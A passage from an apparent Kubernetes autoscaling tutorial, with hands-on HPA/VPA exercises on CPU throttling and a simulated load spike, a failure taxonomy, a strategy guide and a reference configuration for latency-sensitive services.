&lt;span class="c"&gt;# Adjust these numbers to be just over your node's allocatable / 3&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: inflate-test-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: inflate-test
  updatePolicy:
    updateMode: "Auto"
  resourcePolicy:
    containerPolicies:
    - containerName: nginx
      minAllowed:
        cpu: 800m      # Intentionally large — adjust to exceed your node headroom
        memory: 512Mi
      maxAllowed:
        cpu: 2
        memory: 2Gi
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# Watch for Pending pods&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;inflate-test &lt;span class="nt"&gt;--watch&lt;/span&gt; &amp;amp;

&lt;span class="c"&gt;# After VPA evicts and re-creates pods with large requests, check for Pending&lt;/span&gt;
kubectl get events &lt;span class="nt"&gt;--field-selector&lt;/span&gt; &lt;span class="nv"&gt;reason&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;FailedScheduling &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; After VPA injects the inflated requests, some pods may enter &lt;code&gt;Pending&lt;/code&gt; state because no single node has enough remaining allocatable resources. In a real cluster, this is the trigger for Cluster Autoscaler to provision new nodes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cleanup:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete deployment inflate-test
kubectl delete vpa inflate-test-vpa
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Operational Gotchas
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;VPA's OOM learning problem&lt;/strong&gt;: VPA recommends based on observed usage. If your application hasn't experienced peak load during the observation window, VPA will under-recommend memory. An OOMKill resets the histogram's confidence weighting. Always set &lt;code&gt;minAllowed&lt;/code&gt; bounds anchored to values from load testing, not from observed idle-state usage.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CPU throttling blindspot&lt;/strong&gt;: If your containers have tight CPU limits, &lt;code&gt;container_cpu_throttled_seconds_total&lt;/code&gt; will be high but observed CPU usage will appear low. VPA will recommend lower CPU requests, worsening the throttling. Always check the throttling metric before acting on VPA CPU recommendations.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Memory target at p95 is not a ceiling&lt;/strong&gt;: VPA recommends memory at p95, meaning 5% of observed samples exceeded the recommendation. For workloads with heavy GC or periodic batch operations, the tail can be large. Setting &lt;code&gt;maxAllowed&lt;/code&gt; memory without headroom above p95 will still produce OOMKills at peak.&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 10: Inspect VPA Recommendations Under CPU Throttling
&lt;/h3&gt;

&lt;p&gt;This exercise demonstrates the CPU throttling blindspot: tight limits cause VPA to recommend &lt;em&gt;less&lt;/em&gt; CPU, creating a vicious cycle.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Deploy with intentionally tight CPU limits&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: throttle-test
spec:
  replicas: 1
  selector:
    matchLabels:
      app: throttle-test
  template:
    metadata:
      labels:
        app: throttle-test
    spec:
      containers:
      - name: app
        image: registry.k8s.io/ubuntu-slim:0.14
        resources:
          requests:
            cpu: 200m
          limits:
            cpu: 210m    # Limit barely above request — maximum throttling
        command: ["/bin/sh"]
        args:
        - "-c"
        - "while true; do yes &amp;gt;/dev/null; done"  # 100% CPU burn
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# Attach a VPA&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: throttle-test-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: throttle-test
  updatePolicy:
    updateMode: "Off"
  resourcePolicy:
    containerPolicies:
    - containerName: app
      minAllowed:
        cpu: 50m
      maxAllowed:
        cpu: 4
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Check throttling and VPA recommendation&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check actual CPU usage — it will appear bounded by the limit&lt;/span&gt;
kubectl top pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;throttle-test

&lt;span class="c"&gt;# After 5+ minutes, check VPA recommendation&lt;/span&gt;
kubectl describe vpa throttle-test-vpa | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A10&lt;/span&gt; &lt;span class="s2"&gt;"Container Recommendations"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; Even though the container is burning 100% CPU, &lt;code&gt;kubectl top&lt;/code&gt; shows only ~200m (the limit). VPA sees this capped observation and may recommend a value &lt;em&gt;near or below&lt;/em&gt; the current request. In a real environment, you'd check &lt;code&gt;container_cpu_throttled_seconds_total&lt;/code&gt; in Prometheus to confirm throttling.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cleanup:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete deployment throttle-test
kubectl delete vpa throttle-test-vpa
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Autoscaling Failure Taxonomy
&lt;/h2&gt;

&lt;p&gt;Production autoscaling incidents tend to fall into a small number of reusable classes. Naming them makes debugging faster — you can pattern-match a symptom to a class before you have the full picture.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Failure Class&lt;/th&gt;
&lt;th&gt;Root Cause&lt;/th&gt;
&lt;th&gt;Observable Symptom&lt;/th&gt;
&lt;th&gt;Canonical Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Lag-induced saturation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Reaction pipeline slower than load ramp&lt;/td&gt;
&lt;td&gt;High error rate for 90–120s before replicas increase&lt;/td&gt;
&lt;td&gt;CPU HPA at 80% target + sudden 3× traffic spike&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Signal distortion&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Metric ≠ actual load&lt;/td&gt;
&lt;td&gt;VPA recommends lower CPU despite high latency&lt;/td&gt;
&lt;td&gt;CPU throttling suppresses observed usage&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Control loop interference&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Two loops reacting to the same signal&lt;/td&gt;
&lt;td&gt;Oscillating replica count without load change&lt;/td&gt;
&lt;td&gt;CPU-based HPA + VPA Auto mode running simultaneously&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Capacity illusion&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Scheduler or CA lag hides true capacity deficit&lt;/td&gt;
&lt;td&gt;Pods Pending despite "sufficient" cluster capacity&lt;/td&gt;
&lt;td&gt;VPA evicts pods during CA bootstrap window&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Overcorrection / oscillation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Aggressive scale policies or too-low stabilization window&lt;/td&gt;
&lt;td&gt;Replica count thrashes up and down under steady load&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;scaleDown.stabilizationWindowSeconds: 0&lt;/code&gt; on noisy metric&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Bound-induced blindness&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;maxReplicas&lt;/code&gt; or &lt;code&gt;maxAllowed&lt;/code&gt; set too conservatively&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;ScalingLimited&lt;/code&gt; condition True; SLO degraded but HPA appears healthy&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;maxReplicas: 5&lt;/code&gt; on a service that needs 20 during peak&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;When an autoscaling incident starts, the first question is: which class is this? The answer determines whether you look at metric freshness, HPA/VPA coupling, scheduler events, or policy configuration.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Production Incident Pattern: The Black Friday Failure Mode
&lt;/h2&gt;

&lt;p&gt;Consider a typical API service under sudden high load:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Traffic spikes 5× over 2 minutes.&lt;/li&gt;
&lt;li&gt;CPU metrics are ~30s stale. HPA does not yet see elevated utilization.&lt;/li&gt;
&lt;li&gt;HPA eventually fires — but CPU target was set at 80%. The service is already saturated before the first new pod starts.&lt;/li&gt;
&lt;li&gt;VPA, running in &lt;code&gt;Auto&lt;/code&gt; mode, decides this is a good time to evict two pods to update their memory requests. Pod count temporarily drops.&lt;/li&gt;
&lt;li&gt;The evicted pods cannot fit on existing nodes due to larger VPA-requested resources. CA begins provisioning — with a 2–4 minute bootstrap lag.&lt;/li&gt;
&lt;li&gt;By the time new capacity is available, the load spike has peaked and is declining. CA provisions nodes that are no longer needed.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The fix is not a single knob. It requires: external metrics for HPA (RPS instead of CPU), VPA in &lt;code&gt;Initial&lt;/code&gt; mode during high-risk windows, CA warm pools or overprovisioning buffers, and load-tested &lt;code&gt;minAllowed&lt;/code&gt; VPA bounds.&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 11: Simulate the Black Friday Failure Mode End-to-End
&lt;/h3&gt;

&lt;p&gt;This pulls together HPA, VPA, and the scheduler to reproduce the scenario.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Deploy the reference "API service"&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: api-service
spec:
  replicas: 2
  selector:
    matchLabels:
      app: api-service
  template:
    metadata:
      labels:
        app: api-service
    spec:
      containers:
      - name: api
        image: registry.k8s.io/hpa-example
        ports:
        - containerPort: 80
        resources:
          requests:
            cpu: 200m
            memory: 64Mi
          limits:
            cpu: 500m
            memory: 128Mi
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;kubectl expose deployment api-service &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80

&lt;span class="c"&gt;# HPA with 80% CPU target (the anti-pattern)&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: api-service
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: api-service
  minReplicas: 2
  maxReplicas: 10
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 80   # Anti-pattern: too high, no headroom
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# VPA in Auto mode (will evict during the spike)&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: api-service-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: api-service
  updatePolicy:
    updateMode: "Auto"
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Apply a sudden 5× load spike&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Spike started at: &lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%T&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;kubectl run spike-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://api-service; done"&lt;/span&gt; &amp;amp;
&lt;span class="k"&gt;done&lt;/span&gt;

&lt;span class="c"&gt;# Monitor everything simultaneously&lt;/span&gt;
watch &lt;span class="nt"&gt;-n3&lt;/span&gt; &lt;span class="s2"&gt;"
  echo '=== HPA ==='; kubectl get hpa api-service;
  echo '=== Pods ==='; kubectl get pods -l app=api-service;
  echo '=== Events (last 5) ==='; kubectl get events --sort-by='.lastTimestamp' | tail -5
"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe over ~10 minutes:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Initial delay before HPA fires (metric lag + sync period)&lt;/li&gt;
&lt;li&gt;VPA evicting a pod during the spike (pod count temporarily drops)&lt;/li&gt;
&lt;li&gt;HPA and VPA fighting over replica count&lt;/li&gt;
&lt;li&gt;If pods request more resources after eviction, potential scheduling pressure&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Step 3: Apply the fix and compare&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Stop the spike&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;kubectl delete pod spike-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;

&lt;span class="c"&gt;# Fix 1: Lower HPA CPU target to leave headroom&lt;/span&gt;
kubectl patch hpa api-service &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'
spec:
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 50'&lt;/span&gt;

&lt;span class="c"&gt;# Fix 2: Switch VPA to Initial mode (no evictions of running pods)&lt;/span&gt;
kubectl patch vpa api-service-vpa &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'
spec:
  updatePolicy:
    updateMode: "Initial"'&lt;/span&gt;

&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Fixed config applied at: &lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%T&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# Re-run the spike&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;kubectl run spike-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://api-service; done"&lt;/span&gt; &amp;amp;
&lt;span class="k"&gt;done

&lt;/span&gt;watch &lt;span class="nt"&gt;-n3&lt;/span&gt; &lt;span class="s2"&gt;"
  echo '=== HPA ==='; kubectl get hpa api-service;
  echo '=== Pods ==='; kubectl get pods -l app=api-service;
  echo '=== Events (last 5) ==='; kubectl get events --sort-by='.lastTimestamp' | tail -5
"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Cleanup everything:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;kubectl delete pod spike-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done
&lt;/span&gt;kubectl delete deployment api-service php-apache hamster
kubectl delete hpa api-service php-apache &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete vpa api-service-vpa hamster-vpa &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete svc api-service php-apache &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Choosing an Autoscaling Strategy
&lt;/h2&gt;

&lt;p&gt;Given a workload, how do you decide what to configure? The right answer depends on the workload's scheduling properties, traffic shape, and operational risk tolerance — not on what's easiest to configure.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Workload is stateless and traffic is spiky?
  → HPA with external metric (RPS or queue depth)
  → Add CPU as a secondary ceiling if external pipeline is unreliable

Workload is stateful (database, queue, cache)?
  → VPA in Off or Initial mode only — use recommendations to right-size at deploy time
  → HPA only if the workload supports safe horizontal scaling

Traffic is queue-driven (async workers, batch processors)?
  → KEDA with queue-depth metric — HPA's pull-based model is a poor fit for push-based work

Workload is latency-sensitive (p99 SLO &amp;lt; 100ms)?
  → HPA with headroom baked into the target (50% CPU or lower, not 80%)
  → Overprovisioning buffer to absorb the CA bootstrap window
  → VPA in Initial mode; never Auto

CPU-bound workload with well-understood load curve?
  → HPA on CPU is acceptable if: target ≤ 60%, minReplicas absorbs the reaction window,
     and VPA is on an orthogonal metric or in Off mode

You are starting from scratch with no load data?
  → VPA in Off mode for 1–2 full traffic cycles to collect recommendations
  → Use recommendations to set initial requests, then graduate to HPA
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;The general principle&lt;/strong&gt;: configure autoscaling conservatively (lower CPU targets, wider stabilization windows, explicit &lt;code&gt;maxReplicas&lt;/code&gt;) and then loosen based on observed behavior. The failure modes of over-conservative configuration (slightly higher cost, slightly slower reaction) are far more recoverable than the failure modes of over-aggressive configuration (oscillation, cascading evictions, CA thrash).&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Production Design Pattern: A Battle-Tested Reference Architecture
&lt;/h2&gt;

&lt;p&gt;For a stateless, latency-sensitive service that you want to operate safely at scale:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# HPA: scale on RPS, not CPU&lt;/span&gt;
&lt;span class="na"&gt;metrics&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;External&lt;/span&gt;
  &lt;span class="na"&gt;external&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;metric&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;http_requests_per_second&lt;/span&gt;
    &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AverageValue&lt;/span&gt;
      &lt;span class="na"&gt;averageValue&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;400"&lt;/span&gt;

&lt;span class="c1"&gt;# Scaling policies: don't surge, don't collapse&lt;/span&gt;
&lt;span class="na"&gt;behavior&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;scaleUp&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;policies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Percent&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;50&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;
    &lt;span class="na"&gt;selectPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Min&lt;/span&gt;
  &lt;span class="na"&gt;scaleDown&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;stabilizationWindowSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;300&lt;/span&gt;
    &lt;span class="na"&gt;policies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Percent&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;120&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Pair this with VPA in &lt;code&gt;Initial&lt;/code&gt; mode:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;updatePolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;updateMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Initial"&lt;/span&gt;   &lt;span class="c1"&gt;# inject at pod creation, never evict running pods&lt;/span&gt;
&lt;span class="na"&gt;resourcePolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;containerPolicies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;containerName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;*"&lt;/span&gt;
    &lt;span class="na"&gt;minAllowed&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;100m&lt;/span&gt;
      &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;256Mi&lt;/span&gt;       &lt;span class="c1"&gt;# anchored to load test p99&lt;/span&gt;
    &lt;span class="na"&gt;maxAllowed&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;4&lt;/span&gt;
      &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;4Gi&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And complete the stack with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CA warm pool or overprovisioning buffer&lt;/strong&gt; (low-priority placeholder pods that get evicted first, keeping spare capacity pre-warmed)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CPU requests tuned to p50 load&lt;/strong&gt; (not observed idle), informed by VPA recommendations after a full traffic cycle&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;--scale-down-delay-after-add&lt;/code&gt;&lt;/strong&gt; on CA set to at least 10 minutes to prevent thrashing after a provisioning event&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This architecture means HPA scales on a signal with no CPU-request coupling, VPA rightsizes without disrupting running pods, and CA only sees pressure from genuine, sustained scheduling demand.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Cost Dynamics of Autoscaling
&lt;/h2&gt;

&lt;p&gt;Autoscalers have no cost objective — they optimize to keep metrics within bounds. This means cost consequences are entirely a function of how you constrain them.&lt;/p&gt;

